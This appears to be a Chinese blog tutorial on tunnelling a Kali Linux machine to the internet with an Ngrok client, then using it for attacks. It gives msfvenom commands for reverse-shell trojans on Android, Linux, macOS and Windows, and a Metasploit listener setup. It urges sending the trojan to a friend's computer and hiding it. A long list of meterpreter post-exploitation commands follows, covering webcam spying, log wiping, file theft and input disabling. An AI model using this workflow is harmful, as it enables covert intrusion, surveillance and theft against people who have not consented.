项目笔记:Kali使用Ngrok进行内网穿透

       注:本文章仅用于娱乐,请按照《中华人民共和国网络安全法》规范使用

什么是内网穿透

                内网穿透,也被称为NAT(网络地址转换)穿透或内网映射,是一种将本地网络服务暴露给互联网的技术。简单来说,就是让处于局域网(内网)内的设备能够通过互联网进行通信,实现远程访问和操作。

原理如下

  1. 端口映射:在路由器级别进行配置,将外部端口的请求转发到内网设备上的特定端口。
  2. 反向代理:使用反向代理服务器接收外部请求,并将其转发到内网服务上。
  3. VPN:在网络中创建一个加密的“隧道”,允许远程设备安全地访问内网资源。

 

667b0fd58cfe4fb2ad5d5b9f09cc3347.png

常见的内网穿透工具有FRP,NPS,花生壳,Ngrok等,这里就用Ngrok进行简单示范

实操:

准备工具:KALI LINUX

1:进入Ngrok官网(http://www.ngrok.cc

cc361a769bdb4fa79e1b57ca45b56924.png

注册帐号之后点隧道管理——开通隧道——划拉到最底下有免费的(白嫖党狂喜)

之后开始配置

c74599b9ff08453cbe8fccb573492494.png

隧道协议选择tcp(足够用了)名称随便起一个,IP和端口填你kali的端口,主机的也行(麻烦)不过填KALi的ip和端口的话要把你网路模式改到NAT模式

280d9f699cf04636a8a48b7c550a872e.png

141da536de2b4bf9b11d7bedefb0140e.png

填写好之后保存,然后安装Ngrok客户端(http://www.ngrok.cc

30fd28903f354959a164075cbc656116.png

下载好之后拖到kali里面,在里面解压

解压指令

unzip 压缩包名称

c31d382bd7ae43f2af11c66d2b469704.png

进入解压好的目录并开始运行

运行代码

./sunny --server=xxx.xxx.com:端口[赠送域名还有端口] --key=[隧道id]

 

c5abc71400a848c58a92303b3110cd27.png

至此,大功告成,我们可以找一台不在同一个局域网的主机ping一下

渗透测试

我们可以随便搞点什么试验一下,比如说用cs,或者用MSF生成外网木马程序之类的

这里我附上msf生成木马程序的指令

安卓app:
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=520 -o /shell.apk  
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=520-f  elf > shell.elf
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=0.0.0.0 LPORT=520 -f macho >  shell.macho
windows
msfvenom -p windows/meterpreter/reverse_tcp lhost=0.0.0.0 lport=520 -f exe -o /root/shell.exe

注意lhost填隧道上面的域名,lport填TCP域名后面的端口

木马原理也很简单

e81af4c140de4dfea90f003e9dfeaadd.png

 

ab56236b135d4e7ca71549b534845415.png

生成好木马之后打开msfconsole设置攻击载荷

6355bb4c984d4f5f8cd40c59cf09685b.png

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 本机ip
set LPORT 在隧道上填的端口

注意不同的系统有不同的攻击载荷摘不到的话直接set+生成木马指令后面那一坨

6494152b1b4042909816b4141d69b39a.png

之后就run吧(开始监听)然后吧木马发到靶机或者你朋友电脑上(记得进行隐藏后期我会出教程)

971bbbe462154ea58ee0507d50179099.png

cb02148f553d4a6fa2fc72474a53fa42.png

因为我的靶机被奇安信天擎整崩了不方便演示大家可以自行尝试

 

附上msfconsole后渗透指令

webcam_list  #查看摄像头
webcam_snap   #通过摄像头拍照
webcam_stream   #通过摄像头开启视频
clearev #清除windows中的应用程序日志、系统日志、安全日志,需要管理员权限
enumdesktops  #查看可用的桌面
getdesktop    #获取当前meterpreter 关联的桌面
set_desktop   #设置meterpreter关联的桌面  -h查看帮助
screenshot  #截屏
use espia  #或者使用espia模块截屏  然后输入screengrab
run vnc  #使用vnc远程桌面连接,这方法有点问题,上传了exe但是启动不了
background # 让meterpreter处于后台模式
sessions -i index # 与会话进行交互,index表示第一个session
quit # 退出会话
shell # 获得控制台权限
getwd 或者pwd # 查看当前工作目录  
ls
cd
cat c:\\lltest\\lltestpasswd.txt  # 查看文件内容
upload /tmp/hack.txt C:\\lltest  # 上传文件到目标机上
download c:\\lltest\\lltestpasswd.txt /tmp/ # 下载文件到本机上
edit c:\\1.txt #编辑或创建文件  没有的话,会新建文件
rm C:\\lltest\\hack.txt
mkdir lltest2  #只能在当前目录下创建文件夹
rmdir lltest2  #只能删除当前目录下文件夹
getlwd   或者 lpwd   #操作攻击者主机 查看当前目录
lcd /tmp   #操作攻击者主机 切换目录
search -f *secret*.doc  #全局搜索secret.doc这个文件
ps # 查看当前活跃进程
migrate pid # 将Meterpreter会话移植到进程数位pid的进程中
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
getpid # 获取当前进程的pid
kill pid # 杀死进程
getuid # 查看权限
sysinfo # 查看目标机系统信息,如机器名,操作系统等
shutdown # 关机
uictl disable mouse  #禁用鼠标
uictl disable keyboard  #禁用键盘
uictl enable mouse  #开启鼠标
enumdesktops  #查看可用的桌面
getdesktop    #获取当前meterpreter 关联的桌面
set_desktop   #设置meterpreter关联的桌面  -h查看帮助
screenshot  #截屏
use espia  #或者使用espia模块截屏  然后输入screengrab


由于时间安排这段时间并不会出太多笔记,之后我会给大家分享HW经验,面试题,个人网站搭建,包括最近很火的单片机制作小智AI等

完结撒花~

 

 

 

 

 

### Kali Linux 上设置 Ngrok 进行内网穿透 #### 安装 Ngrok 客户端 为了在 Kali Linux 中使用 Ngrok 实现内网穿透,需先下载并安装 Ngrok 的客户端。访问官方网站 https://ngrok.com/ 或者国内镜像站点获取最新版的 Ngrok 下载链接[^2]。 #### 注册账户与认证 前往 Ngrok 官方网站注册账号,推荐通过 GitHub 账号直接登录以规避可能遇到的验证码问题。完成注册后,在个人页面找到 Authtoken 并保存下来;此令牌用于激活本地计算机上的 Ngrok 服务。 ```bash ./ngrok authtoken your_auth_token_here ``` 上述命令中的 `your_auth_token_here` 需替换为实际获得的授权码字符串。 #### 启动隧道服务 成功绑定账号后即可创建新的隧道连接。假设要暴露本地运行的一个 HTTP Web 应用程序,则可执行如下指令: ```bash ./ngrok http 80 ``` 这条语句表示将本机第 80 号端口映射至互联网上随机分配的一个公共 URL 地址下[^4]。 对于更复杂的场景如远程桌面共享或是其他 TCP 协议支持的服务,也可以指定不同的参数来满足需求。例如建立 SSH 访问通道: ```bash ./ngrok tcp 22 ``` 这会把本地 SSH 服务开放出去供外部网络接入。 #### 设置持久化连接 (可选) 如果希望构建更加稳定可靠的长期在线环境,考虑利用 Crontab 或 Systemd 等机制确保 Ngrok 进程始终处于活动状态。另外还可以借助特定脚本来定期重启或监控其工作状况[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值